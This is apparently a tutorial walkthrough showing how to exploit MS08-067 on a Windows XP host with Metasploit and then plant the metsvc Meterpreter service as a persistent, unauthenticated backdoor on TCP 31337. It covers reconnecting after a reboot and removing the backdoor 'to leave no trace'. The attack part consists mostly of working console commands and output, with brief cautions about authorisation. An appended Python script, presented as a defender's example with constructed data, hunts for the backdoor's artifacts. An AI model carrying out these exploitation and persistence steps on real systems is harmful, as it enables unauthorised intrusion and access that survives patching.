First, we need a Meterpreter session on the remote system. In this example I get it with the MS08-067 exploit against a Windows XP SP3 host:
           =[ metasploit v3.3.4-dev [core:3.3 api:1.0]
    + -- --=[ 489 exploits - 225 auxiliary
    + -- --=[ 192 payloads - 23 encoders - 8 nops
           =[ svn r8074 updated today (2010.01.05)

    msf > use exploit/windows/smb/ms08_067_netapi
    msf exploit(ms08_067_netapi) > set RHOST 172.16.83.128
    RHOST => 172.16.83.128
    msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
    PAYLOAD => windows/meterpreter/bind_tcp
    msf exploit(ms08_067_netapi) > set LHOST 172.16.83.1
    LHOST => 172.16.83.1
    msf exploit(ms08_067_netapi) > exploit

    [*] Started bind handler
    [*] Automatically detecting the target...
    [*] Fingerprint: Windows XP Service Pack 3 - lang:English
    [*] Selected Target: Windows XP SP3 English (NX)
    [*] Triggering the vulnerability...
    [*] Sending stage (723456 bytes)
    [*] Meterpreter session 3 opened (172.16.83.1:54745 -> 172.16.83.128:4444)

    meterpreter >
Once we have the session, we run the metsvc script, which uploads a Meterpreter server to the remote host and installs it as a Windows service, so it starts again on every boot. As the output shows, it listens on TCP port 31337 and drops its files into a randomly named directory under C:\WINDOWS\TEMP:
    meterpreter > run metsvc
    [*] Creating a meterpreter service on port 31337
    [*] Creating a temporary installation directory C:\WINDOWS\TEMP\HdOFwlxzpobWuh...
    [*]  >> Uploading metsrv.dll...
    [*]  >> Uploading metsvc-server.exe...
    [*]  >> Uploading metsvc.exe...
    [*] Starting the service...
         * Installing service metsvc
         * Starting service
    Service metsvc successfully installed.
Now we can reboot the remote system if we want to prove the persistence, although the service is already running without a reboot.
    meterpreter > reboot
    Rebooting...
    meterpreter >
Once the remote host comes back up, we connect to the Meterpreter service we just installed.
To do that we use exploit/multi/handler with the windows/metsvc_bind_tcp payload (note that this is a payload, not an exploit: the handler just connects to the listener that metsvc already opened). We set LPORT to the service port and RHOST to the target, then run it, as I do below. Note that the old session is gone after the reboot, which is why the new one gets session id 1:
    msf > use exploit/multi/handler
    msf exploit(handler) > set PAYLOAD windows/metsvc_bind_tcp
    PAYLOAD => windows/metsvc_bind_tcp
    msf exploit(handler) > show options

    Module options:

       Name  Current Setting  Required  Description
       ----  ---------------  --------  -----------


    Payload options (windows/metsvc_bind_tcp):

       Name      Current Setting  Required  Description
       ----      ---------------  --------  -----------
       EXITFUNC  process          yes       Exit technique: seh, thread, process
       LPORT     4444             yes       The local port
       RHOST                      no        The target address


    Exploit target:

       Id  Name
       --  ----
       0   Wildcard Target


    msf exploit(handler) > set LPORT 31337
    LPORT => 31337
    msf exploit(handler) > set RHOST 172.16.83.128
    RHOST => 172.16.83.128
    msf exploit(handler) > exploit

    [*] Starting the payload handler...
    [*] Started bind handler
    [*] Meterpreter session 1 opened (172.16.83.1:42050 -> 172.16.83.128:31337)

    meterpreter >
And that's it! This comes in handy if the remote host later applies a patch that closes the vulnerability we came in through.
Even after the system is patched, we keep access to it through this backdoor. Keep in mind what that backdoor is, though: metsvc is a bind listener with no authentication of its own, so anyone who can reach TCP 31337 on the target gets the same SYSTEM-level session we do. It is also a plain service that any administrator can spot with a service listing or a look at the open ports, so use it only where the engagement allows it and remove it when you are done.
If we want to uninstall metsvc on the remote host so as to leave no trace, we just run metsvc -r from our Meterpreter session. As the output shows, removal uploads metsvc.exe again into a new temporary directory to stop and delete the service, so it is worth checking afterwards that those temporary directories under C:\WINDOWS\TEMP are gone as well.
    meterpreter > run metsvc -r
    [*] Removing the existing Meterpreter service
    [*] Creating a temporary installation directory C:\WINDOWS\TEMP\QQqawIYOjLq...
    [*]  >> Uploading metsvc.exe...
    [*] Stopping the service...
         * Stopping service
         * Removing service
    Service metsvc successfully removed.

    meterpreter >
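As an added example that is not part of the original post, here is the same procedure seen from the defender's side: a small Python hunt for the artifacts that run metsvc leaves on a Windows host, taken from the console output above. It looks for a service named metsvc, for the three uploaded files (metsvc.exe, metsvc-server.exe, metsrv.dll) sitting in a random directory directly under C:\WINDOWS\TEMP, and for a listening TCP socket on 31337. The way the service, file and netstat data is collected (wmic/sc, a directory listing, netstat -ano) is assumed rather than shown on the page, the binary path of the service is a guess, and every sample record is constructed for the example.

```python
r"""Hunt for the traces that `run metsvc` leaves on a Windows host.

Added example, not code from the original post or from Metasploit. The
indicators come from the post's console output: a service named "metsvc",
the files metsvc.exe, metsvc-server.exe and metsrv.dll uploaded into a
random directory under C:\WINDOWS\TEMP, and a bind listener on TCP 31337.
Every sample record below is constructed; nothing here was captured.
"""
import re
from dataclasses import dataclass

METSVC_FILES = {"metsvc.exe", "metsvc-server.exe", "metsrv.dll"}
DEFAULT_PORT = 31337  # the port metsvc listened on in the post
# Random, letters-only directory name directly under C:\WINDOWS\TEMP.
TEMP_DROP_RE = re.compile(r"^c:\\windows\\temp\\[a-z]+$", re.IGNORECASE)
# One `netstat -ano` row for a listening TCP socket (assumed input format).
NETSTAT_RE = re.compile(r"^\s*TCP\s+(\S+):(\d+)\s+\S+\s+LISTENING\s+(\d+)\s*$")


@dataclass
class Finding:
    kind: str    # "service", "temp-drop", "dir" or "listener"
    detail: str


def check_services(services):
    """services: (name, binary_path) pairs, as `wmic service get Name,PathName`
    would give (assumed collector). Flag the metsvc service name or any
    service whose executable is one of the dropped files."""
    findings = []
    for name, path in services:
        exe = path.strip('"').split()[0]          # drop trailing arguments
        base = exe.rsplit("\\", 1)[-1].lower()
        if name.lower() == "metsvc" or base in METSVC_FILES:
            findings.append(Finding("service", f"{name} -> {path}"))
    return findings


def check_files(paths):
    """Group dropped files by directory; a directory that matches the
    C:\\WINDOWS\\TEMP\\<random> pattern is reported as "temp-drop"."""
    by_dir = {}
    for p in paths:
        d, _, base = p.rpartition("\\")
        if base.lower() in METSVC_FILES:
            by_dir.setdefault(d, set()).add(base.lower())
    findings = []
    for d, names in by_dir.items():
        kind = "temp-drop" if TEMP_DROP_RE.match(d) else "dir"
        findings.append(Finding(kind, f"{d}: {', '.join(sorted(names))}"))
    return findings


def check_listeners(netstat_lines, port=DEFAULT_PORT):
    """Flag a listening TCP socket on the metsvc port (default 31337).
    The operator can change that port, so pass the one you expect."""
    findings = []
    for line in netstat_lines:
        m = NETSTAT_RE.match(line)
        if m and int(m.group(2)) == port:
            findings.append(Finding("listener", f"{m.group(1)}:{port} pid={m.group(3)}"))
    return findings


# Constructed sample data. The service path and directory name are made up.
SAMPLE_SERVICES = [
    ("wuauserv", r"C:\WINDOWS\system32\svchost.exe -k netsvcs"),
    ("metsvc", r"C:\WINDOWS\TEMP\AbCdEfGhIjKl\metsvc.exe"),
]
SAMPLE_FILES = [
    r"C:\WINDOWS\TEMP\AbCdEfGhIjKl\metsvc.exe",
    r"C:\WINDOWS\TEMP\AbCdEfGhIjKl\metsvc-server.exe",
    r"C:\WINDOWS\TEMP\AbCdEfGhIjKl\metsrv.dll",
    r"C:\WINDOWS\system32\notepad.exe",
]
SAMPLE_NETSTAT = [
    "  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       884",
    "  TCP    0.0.0.0:31337          0.0.0.0:0              LISTENING       1532",
    "  TCP    172.16.83.128:139      0.0.0.0:0              LISTENING       4",
]


def hunt(services=SAMPLE_SERVICES, files=SAMPLE_FILES, netstat=SAMPLE_NETSTAT):
    """Run all three checks and return the combined findings."""
    return check_services(services) + check_files(files) + check_listeners(netstat)


if __name__ == "__main__":
    for f in hunt():
        print(f"[{f.kind}] {f.detail}")
```

Running it against the constructed data reports one finding per indicator. After a run metsvc -r the service and listener checks should come back empty; if check_files still reports a temp-drop directory, the cleanup was incomplete.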